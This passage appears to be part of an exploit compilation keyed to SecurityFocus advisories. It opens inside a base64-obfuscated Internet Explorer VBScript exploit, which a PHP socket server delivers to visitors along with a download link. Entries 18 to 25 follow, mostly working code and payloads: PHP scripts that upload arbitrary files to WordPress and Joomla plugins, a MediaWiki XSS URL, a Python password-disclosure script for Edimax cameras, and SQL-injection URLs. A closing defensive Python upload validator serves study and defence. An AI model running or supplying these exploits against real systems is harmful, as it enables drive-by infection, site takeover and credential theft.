eWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4 dAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w KSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv LCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu Zm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1 bmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p dCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp JmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm Y2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw MCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50 LndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg ICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg ICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K IApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy ZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp b24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD cmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg ICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm dW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u IEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg UHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo MCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo Mik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g IFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt b2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt 
KGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv ICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo ZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg ICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg ICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg Zm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2 NzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog ICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl cj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK ICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog ICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg IElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u PDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg ICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9 bWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu ICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg ICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK ICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg ICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK ICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg ICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0 eXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK 
ICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg ICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92 ZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg ICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp bSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu Y3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg IGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg IAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv bgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg==';

$msgd=base64_decode($msg);
$msgd=str_replace("FILE_DOWNLOAD",$link,$msgd);

for (;;) {
    if ($client = @socket_accept($reza)) {
        socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd);
        print "\n Target Checked Your Link \n";
    }
    else usleep(100000);
}
?>
18. source: https://www.securityfocus.com/bid/53995/info

Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Invit0r 0.22 is vulnerable; other versions may also be affected.

<?php
$headers = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
19. source: https://www.securityfocus.com/bid/53998/info

MediaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable.

http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27
20. source: https://www.securityfocus.com/bid/54006/info

Edimax IC-3030iWn is prone to an information-disclosure vulnerability.

Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.

#!/usr/bin/env python
"""
# Exploit Title: Edimax IC-3030iWn Web Admin Auth Bypass exploit
# Date: 4 April 2012
# Exploit Author: y3dips@echo.or.id, @y3dips
# URL: http://echo.or.id
# Vendor Homepage: http://www.edimax.com
# Sourcecode Link: http://www.edimax.com/en/produce_detail.php?pd_id=352&pl1_id=8&pl2_id=91
# Also Tested on:
# - Edimax IC-3015
# - Airlive WN 500
# Bug found by: Ben Schmidt for RXS-3211 IP camera http://www.securityfocus.com/archive/1/518123
# To successfully automate your browser launch, change browser path.
"""

import socket
import webbrowser
import sys

if len(sys.argv) != 2:
    print "Eg: ./edimaxpwned.py edimax-IP"
    sys.exit(1)

port=13364
target= sys.argv[1]

def read_pw(target, port):
    devmac = "\xff\xff\xff\xff\xff\xff"
    code="\x00\x06\xff\xf9" #for unicast reply
    data=devmac+code
    sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
    sock.connect((target,port))
    try:
        sock.send(data)
        sock.settimeout(5)
        tmp = sock.recv(4096)
        return tmp
    except socket.timeout:
        return None

def pwned_edi():
    data=read_pw(target, port)
    if data != None:
        data=data[365:377]
        pw=data.strip("\x00")
        webbrowser.get("/Applications/Firefox.app/Contents/MacOS/firefox-bin %s" ).open('http://admin:'+pw+'@'+target+'/index.asp')
    else:
        print "Socket timeOut or not Vulnerable"

pwned_edi()
21. source: https://www.securityfocus.com/bid/54023/info

ADICO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ADICO 1.1 is vulnerable; other versions may also be affected.

http://www.example.com/car-rent/[PATH]/admin/index.php?job=cars&action=edit&id=[SQL INJECTION]
http://www.example.com/car-rent/[PATH]/admin/index.php?job=calendar&action=month&id=[SQL INJECTION]
22. source: https://www.securityfocus.com/bid/54020/info

Zingiri Web Shop plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Zingiri Web Shop 2.4.3 is vulnerable; other versions may also be affected.

<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php?fh=/&action=save");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('fh'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
23. source: https://www.securityfocus.com/bid/54024/info

Simple Forum PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Simple Forum PHP 2.1 is vulnerable; other versions may also be affected.

http://www.example.com/cms/forum.php?p=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum.php?orderType=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum.php?orderType=[ASC/DESC]&orderBy=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum/admin.php?act=topics&orderType=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum/admin.php?act=topics&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]--
24. source: https://www.securityfocus.com/bid/54026/info

NetArt Media Jobs Portal is prone to multiple HTML-injection vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

NetArt Media Jobs Portal 3.0 is vulnerable; other versions may also be affected.

http://www.example.com/EMPLOYERS/index.php?category=application_management&folder=my&page=details&posting_id=113&apply_id=68+order+%20by+1--%20[SQL INJECTION]--
25. source: https://www.securityfocus.com/bid/54037/info

The hwdVideoShare component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

hwdVideoShare r805 is vulnerable; other versions may also be affected.

<?php
$uploadfile="lo.php.vob";
$ch = curl_init("http://www.example.com/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
echo "<br />";

$i = 0;
for ($i=1;$i<9999;$i++) {
    $n = 4;
    $num = str_pad((int) $i,$n,"0",STR_PAD_LEFT);
    $filename = date('YmdH').$num.$uploadfile;
    $url = "http://www.exemple.com/tmp/".$filename;
    $c = curl_init("$url");
    $postResult2 = curl_exec($c);
    $info = curl_getinfo($c);
    $httpcode = $info['http_code'];
    if($httpcode == 200){
        echo $url;
        curl_close($c);
        exit;
    }
}
?>
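Several of the posts above (Art Uploader, Simple SWFUpload, Evarisk, Invit0r, Zingiri Web Shop, hwdVideoShare) are the same weakness seen from the outside: an upload handler that trusts the client-supplied filename, accepts a double extension such as lo.php.gif, or, in the hwdVideoShare case, stores the file under a predictable date-based name. The Python below is an added example, not code from any of those projects, of the checks a defender puts on such a handler. The allowlist, the magic bytes, the function names and the sample uploads are constructed for the example.

```python
import os
import re
import secrets

# Allowlist of extensions the handler will store, each with the magic bytes
# the content must start with. Constructed for the example; a real deployment
# lists only the types the application actually needs.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# PHP open tags: an "image" carrying one is a polyglot that runs if it ever
# lands somewhere the web server treats files as scripts.
_PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_upload(client_filename: str, content: bytes) -> str:
    """Return the server-chosen storage name for an accepted upload.

    Checks, in order: the client name carries no path component or NUL byte,
    it has exactly one extension and that extension is on the allowlist, the
    content starts with the magic bytes of the declared type, and the content
    embeds no PHP open tag. The returned name is random, so it can neither be
    chosen by the client (lo.php) nor enumerated from a timestamp.
    """
    if not client_filename or "\x00" in client_filename:
        raise UploadRejected("empty filename or NUL byte")
    normalized = client_filename.replace("\\", "/")
    if os.path.basename(normalized) != normalized or normalized.startswith("."):
        raise UploadRejected("path component in filename")
    parts = normalized.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("exactly one extension is required")
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension not on allowlist: ." + ext)
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match declared type")
    if _PHP_OPEN_TAG.search(content):
        raise UploadRejected("script tag embedded in file content")
    return secrets.token_hex(16) + "." + ext


def is_rejected(client_filename: str, content: bytes) -> bool:
    """True when validate_upload refuses the upload (used by the checks)."""
    try:
        validate_upload(client_filename, content)
    except UploadRejected:
        return True
    return False


# Constructed sample uploads modelled on the PoCs above: a minimal PNG header
# and the one-line PHP file the PoCs send.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_PHP = b"<?php phpinfo(); ?>"
```

The returned name is what gets joined onto the storage directory; keeping that directory outside the document root (or served with script execution disabled) is the second half of the control, since the validator only decides what is written, not how the web server later treats it.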